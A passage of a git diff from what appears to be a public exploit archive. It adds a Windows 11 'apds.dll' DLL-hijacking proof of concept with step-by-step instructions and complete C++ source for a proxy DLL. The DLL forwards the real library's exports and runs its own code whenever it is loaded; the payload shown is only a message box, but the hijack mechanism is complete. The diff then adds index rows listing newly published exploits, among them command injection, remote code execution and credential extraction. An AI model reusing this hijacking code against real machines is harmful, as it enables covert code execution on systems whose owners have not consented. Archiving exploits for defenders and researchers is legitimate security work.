+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/windows/local/51733.txt b/exploits/windows/local/51733.txt new file mode 100644 index 000000000..1c0b388bb --- /dev/null +++ b/exploits/windows/local/51733.txt @@ -0,0 +1,230 @@ + #--------------------------------------------------------- +# Title: Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced) +# Date: 2023-09-01 +# Author: Moein Shahabi +# Vendor: https://www.microsoft.com +# Version: Windows 11 Pro 10.0.22621 +# Tested on: Windows 11_x64 [eng] + +#--------------------------------------------------------- + + +Description: + +HelpPane object allows us to force Windows 11 to DLL hijacking + +Instructions: + +1. Compile dll +2. Copy newly compiled dll "apds.dll" in the "C:\Windows\" directory +3. Launch cmd and Execute the following command to test HelpPane object "[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID('8CEC58AE-07A1-11D9-B15E-000D56BFE6EE'))" +4. Boom DLL Hijacked! + + +------Code_Poc------- +#pragma once +#include + + + +// Function executed when the thread starts +extern "C" __declspec(dllexport) +DWORD WINAPI MessageBoxThread(LPVOID lpParam) { +    MessageBox(NULL, L"DLL Hijacked!", L"DLL Hijacked!", NULL); +    return 0; +} + +PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE) { +#ifdef _WIN64 +    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress; +    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); +    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; + +    // Create some breathing room +    baseAddress = baseAddress + optionalHeader->SizeOfImage; + +    for (PBYTE offset = baseAddress; offset < baseAddress + MAXDWORD; offset += 1024 * 8) { +        PBYTE usuable = (PBYTE)VirtualAlloc( +            offset, +            size, +            MEM_RESERVE | MEM_COMMIT, +            protection); + +        if (usuable) { +            ZeroMemory(usuable, size); // Not sure if this is required +            return usuable; +        } +    } +#else +    // x86 doesn't matter where we allocate + +    PBYTE usuable = (PBYTE)VirtualAlloc( +        NULL, +        size, +        MEM_RESERVE | MEM_COMMIT, +        protection); + +    if (usuable) { +        ZeroMemory(usuable, size); +        return usuable; +    } +#endif +    return 0; +} + +BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase) +{ +#ifdef _WIN64 +    BYTE jmpPrefix[] = { 0x48, 0xb8 }; // Mov Rax +    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Rax +#else +    BYTE jmpPrefix[] = { 0xb8 }; // Mov Eax +    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Eax +#endif + +    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase; +    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); +    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; +    PIMAGE_DATA_DIRECTORY exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; +    if (exportDataDirectory->Size == 0) +        return FALSE; // Nothing to forward + +    PIMAGE_EXPORT_DIRECTORY targetExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); + +    if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames) +        return FALSE; // TODO: Add support for DLLs with mixed ordinals + +    dosHeader = (PIMAGE_DOS_HEADER)ourBase; +    ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); +    optionalHeader = &ntHeaders->OptionalHeader; +    exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; +    if (exportDataDirectory->Size == 0) +        return FALSE; // Our DLL is broken + +    PIMAGE_EXPORT_DIRECTORY ourExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); + +    // ---------------------------------- + +    // Make current header data RW for redirections +    DWORD oldProtect = 0; +    if (!VirtualProtect( +        ourExportDirectory, +        64, PAGE_READWRITE, +        &oldProtect)) { +        return FALSE; +    } + +    DWORD totalAllocationSize = 0; + +    // Add the size of jumps +    totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpSuffix) + sizeof(LPVOID)); + +    // Add the size of function table +    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT); + +    // Add total size of names +    PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames); +    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) +        totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1; + +    // Add size of name table +    totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT); + +    // Add the size of ordinals: +    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); + +    // Allocate usuable memory for rebuilt export data +    PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE); +    if (!exportData) +        return FALSE; + +    PBYTE sideAllocation = exportData; // Used for VirtualProtect later + +    // Copy Function Table +    PINT newFunctionTable = (PINT)exportData; +    CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfFunctions * sizeof(INT)); +    exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT); +    ourExportDirectory->AddressOfFunctions = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase); + +    // Write JMPs and update RVAs in the new function table +    PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions); +    for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) { +        newFunctionTable[i] = (DWORD)(exportData - (PBYTE)ourBase); + +        CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix)); +        exportData += sizeof(jmpPrefix); + +        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]); +        CopyMemory(exportData, &realAddress, sizeof(LPVOID)); +        exportData += sizeof(LPVOID); + +        CopyMemory(exportData, jmpSuffix, sizeof(jmpSuffix)); +        exportData += sizeof(jmpSuffix); +    } + +    // Copy Name RVA Table +    PINT newNameTable = (PINT)exportData; +    CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfNames * sizeof(DWORD)); +    exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD); +    ourExportDirectory->AddressOfNames = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase); + +    // Copy names and apply delta to all the RVAs in the new name table +    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) { +        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]); +        DWORD length = (DWORD)strlen((LPCSTR)realAddress); +        CopyMemory(exportData, realAddress, length); +        newNameTable[i] = (DWORD)((PBYTE)exportData - (PBYTE)ourBase); +        exportData += length + 1; +    } + +    // Copy Ordinal Table +    PINT newOrdinalTable = (PINT)exportData; +    CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirectory->NumberOfFunctions * sizeof(USHORT)); +    exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); +    ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase); + +    // Set our counts straight +    ourExportDirectory->NumberOfFunctions = targetExportDirectory->NumberOfFunctions; +    ourExportDirectory->NumberOfNames = targetExportDirectory->NumberOfNames; + +    if (!VirtualProtect( +        ourExportDirectory, +        64, oldProtect, +        &oldProtect)) { +        return FALSE; +    } + +    if (!VirtualProtect( +        sideAllocation, +        totalAllocationSize, +        PAGE_EXECUTE_READ, +        &oldProtect)) { +        return FALSE; +    } + +    return TRUE; +} +// Executed when the DLL is loaded (traditionally or through reflective injection) +BOOL APIENTRY DllMain(HMODULE hModule, +    DWORD  ul_reason_for_call, +    LPVOID lpReserved +) +{ +    HMODULE realDLL; +    switch (ul_reason_for_call) +    { +    case DLL_PROCESS_ATTACH: +        CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL); +        realDLL = LoadLibrary(L"C:\\Windows\\System32\\apds.dll"); +        if (realDLL) +            ProxyExports(hModule, realDLL); + + +    case DLL_THREAD_ATTACH: +    case DLL_THREAD_DETACH: +    case DLL_PROCESS_DETACH: +        break; +    } +    return TRUE; +} +-------------------------- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index df321cd7d..45c57e219 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,, +51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,, 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,, 51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,, 51496,exploits/go/webapps/51496.txt,"Pydio Cells 4.1.2 - Unauthorised Role Assignments",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32749,,,,, @@ -3206,6 +3207,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4319,exploits/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,dos,hardware,,2007-08-26,2016-10-27,1,CVE-2007-4553,,,,, 30530,exploits/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",dos,hardware,,2007-08-27,2016-10-27,1,CVE-2007-4553;OSVDB-39850,,,,,https://www.securityfocus.com/bid/25446/info 25124,exploits/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,dos,hardware,,2005-02-19,2013-05-01,1,CVE-2003-1085;OSVDB-14022,,,,,https://www.securityfocus.com/bid/12595/info +51730,exploits/hardware/dos/51730.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service",2023-10-09,LiquidWorm,dos,hardware,,2023-10-09,2023-10-09,0,,,,,, 11043,exploits/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,dos,hardware,,2010-01-05,,0,,,Sony_Ericsson.rar,,, 48255,exploits/hardware/dos/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,dos,hardware,,2020-03-26,2020-03-26,0,CVE-2020-9375,,,,, 40910,exploits/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",dos,hardware,,2016-12-13,2016-12-13,0,,,,,, @@ -3337,6 +3339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb 43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware,,2018-01-25,2018-01-25,0,CVE-2018-6000;CVE-2018-5999,,,,,https://github.com/pedrib/PoC/blob/787b92c549c7a8ddd53740ef0fbc1e04c12a18b6/advisories/asuswrt-lan-rce.txt +51742,exploits/hardware/remote/51742.txt,"Atcom 2.7.x.x - Authenticated Command Injection",2023-10-09,"Mohammed Adel",remote,hardware,,2023-10-09,2023-10-09,0,,,,,, 50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,, 50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,, 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2022-01-05,0,CVE-2021-40859,,,,, @@ -3862,6 +3865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,, 51138,exploits/hardware/remote/51138.txt,"Router ZTE-H108NS - Authentication Bypass",2023-03-30,"George Tsimpidas",remote,hardware,,2023-03-30,2023-03-30,0,,,,,, 18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware,,2012-04-24,2012-04-24,0,CVE-2012-2441;OSVDB-81406;CVE-2012-1803,,,,, +51727,exploits/hardware/remote/51727.txt,"Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)",2023-10-09,"Riyan Firmansyah of Seclab",remote,hardware,,2023-10-09,2023-10-09,0,,,,,, 50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",2022-05-11,"Minh Khoa",remote,hardware,,2022-05-11,2022-05-11,0,CVE-2021-43164,,,,, 35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware,,2011-05-25,2015-01-16,1,,,,,,https://www.securityfocus.com/bid/47976/info 35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware,,2011-07-27,2015-02-06,1,,,,,,https://www.securityfocus.com/bid/48908/info @@ -3942,6 +3946,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9432,exploits/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",remote,hardware,,2009-08-12,,1,,,,,, 829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,remote,hardware,80,2005-02-18,,1,OSVDB-14023;CVE-2005-0494,,,,, 10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware,,2009-12-08,,0,OSVDB-104795,,,,, +51732,exploits/hardware/remote/51732.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,, +51731,exploits/hardware/remote/51731.py,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,, 40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware,,2016-08-19,2017-11-22,0,,,,,, 51677,exploits/hardware/remote/51677.py,"TP-Link Archer AX21 - Unauthenticated Command Injection",2023-08-10,Voyag3r,remote,hardware,,2023-08-10,2023-08-10,0,CVE-2023-1389,,,,, 38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware,,2015-09-15,2015-09-15,0,OSVDB-127536,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php @@ -9870,6 +9876,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23181,exploits/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",dos,multiple,,2003-09-24,2012-12-06,1,OSVDB-3571,,,,,https://www.securityfocus.com/bid/8697/info 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,,2020-12-17,2021-01-11,0,CVE-2020-35488,,,,, 10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389,2009-11-08,,1,,,,,,https://www.securityfocus.com/bid/27778/info +51746,exploits/multiple/dos/51746.txt,"OpenPLC WebServer 3 - Denial of Service",2023-10-09,"Kai Feng",dos,multiple,,2023-10-09,2023-10-09,0,,,,,, 17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple,,2011-08-05,2011-08-05,0,CVE-2010-3609,,,,http://www.exploit-db.comopenslp-1.2.1.tar.gz, 2444,exploits/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service",2006-09-27,"Tavis Ormandy",dos,multiple,,2006-09-26,2016-09-12,1,OSVDB-29152;CVE-2006-4924,,,,http://www.exploit-db.comopenssh-4.1p1.tar.gz, 18756,exploits/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",dos,multiple,,2012-04-19,2012-04-19,1,CVE-2012-2131;OSVDB-81223;CVE-2012-2110,,,,, @@ -12172,6 +12179,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",webapps,multiple,,2014-02-28,2014-02-28,0,CVE-2013-6231;OSVDB-103890,,,,, 48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,,2020-09-18,2020-09-18,0,CVE-2020-11804;CVE-2020-11803;CVE-2020-11700;CVE-2020-11699,,,,, 21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",webapps,multiple,,2012-09-04,2012-09-04,0,OSVDB-85824,,,,, +51747,exploits/multiple/webapps/51747.py,"Splunk 9.0.5 - admin account take over",2023-10-09,"Redway Security",webapps,multiple,,2023-10-09,2023-10-09,0,CVE-2023-32707,,,,, 41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,webapps,multiple,,2017-03-31,2017-03-31,1,CVE-2017-5607,,,,, 40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,webapps,multiple,,2016-12-09,2016-12-09,1,,,,,, 49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,,2020-12-21,2020-12-21,0,,,,,, @@ -14990,6 +14998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11249,exploits/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,webapps,php,,2010-01-23,,0,,,,,, 18676,exploits/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,webapps,php,,2012-03-28,2012-08-13,1,OSVDB-80660,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-06-at-21926-pm.png,http://www.exploit-db.combmachine-3.1.zip, 5858,exploits/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46425;CVE-2008-2846,,,,, +51741,exploits/php/webapps/51741.py,"BoidCMS v2.0.0 - authenticated file upload vulnerability",2023-10-09,1337kid,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-38836,,,,, 30575,exploits/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38668,,,,,https://www.securityfocus.com/bid/25644/info 30576,exploits/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38669,,,,,https://www.securityfocus.com/bid/25644/info 2153,exploits/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",webapps,php,,2006-08-08,,1,OSVDB-29747;CVE-2006-4123,,,,, @@ -15226,6 +15235,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 12338,exploits/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",webapps,php,,2010-04-21,,1,CVE-2010-1431;OSVDB-63967,,Bonsai-SQL_Injection_in_Cacti.pdf,,, 33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php,,2009-11-21,2014-05-16,1,CVE-2009-4032;OSVDB-60566,,,,http://www.exploit-db.comcacti-0.8.7e.zip,https://www.securityfocus.com/bid/37109/info 49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",2021-04-29,"Leonardo Paiva",webapps,php,,2021-04-29,2021-10-29,0,CVE-2020-14295,,,,, +51740,exploits/php/webapps/51740.txt,"Cacti 1.2.24 - Authenticated command injection when using SNMP options",2023-10-09,"Antonio Francesco Sardella",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-39362,,,,, 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,, 33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, 35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, @@ -15569,7 +15579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info 15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip, 7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,, -51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,, +51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-10-09,0,CVE-2023-31714,,,,, 31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info 31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info 31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info @@ -15719,6 +15729,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3542,exploits/php/webapps/3542.txt,"ClassWeb 2.0.3 - 'BASE' Remote File Inclusion",2007-03-22,GoLd_M,webapps,php,,2007-03-21,2016-09-30,1,OSVDB-37215;CVE-2007-1640;OSVDB-37214,,,,http://www.exploit-db.comclassweb_2.03.tar.gz, 34365,exploits/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",webapps,php,,2010-07-22,2014-08-19,1,,,,,,https://www.securityfocus.com/bid/41885/info 42773,exploits/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",webapps,php,,2017-09-24,2017-09-24,0,CVE-2017-14704,,,,, +51729,exploits/php/webapps/51729.txt,"Clcknshop 1.0.0 - SQL Injection",2023-10-09,CraCkEr,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4708,,,,, 7230,exploits/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,webapps,php,,2008-11-24,2017-01-03,1,OSVDB-50174;CVE-2008-5289,,,,, 7228,exploits/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-50174;CVE-2008-5290;OSVDB-50172;CVE-2008-5289,,,,, 46146,exploits/php/webapps/46146.txt,"Cleanto 5.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80,2019-01-14,2019-01-14,0,,"SQL Injection (SQLi)",,,, @@ -16213,6 +16224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 30803,exploits/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",webapps,php,,2007-11-24,2014-01-09,1,,,,,,https://www.securityfocus.com/bid/26558/info 27669,exploits/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1909;OSVDB-24744,,,,,https://www.securityfocus.com/bid/17570/info 18680,exploits/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,webapps,php,,2012-03-30,2012-03-30,1,OSVDB-80735;OSVDB-80734;OSVDB-80733;OSVDB-80732;OSVDB-80731;CVE-2012-1614;CVE-2012-1613,,,,http://www.exploit-db.comcpg1.5.18.7z,http://www.waraxe.us/advisory-81.html +51738,exploits/php/webapps/51738.txt,"Coppermine Gallery 1.6.25 - RCE",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,, 41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal",2017-02-15,"Hacker 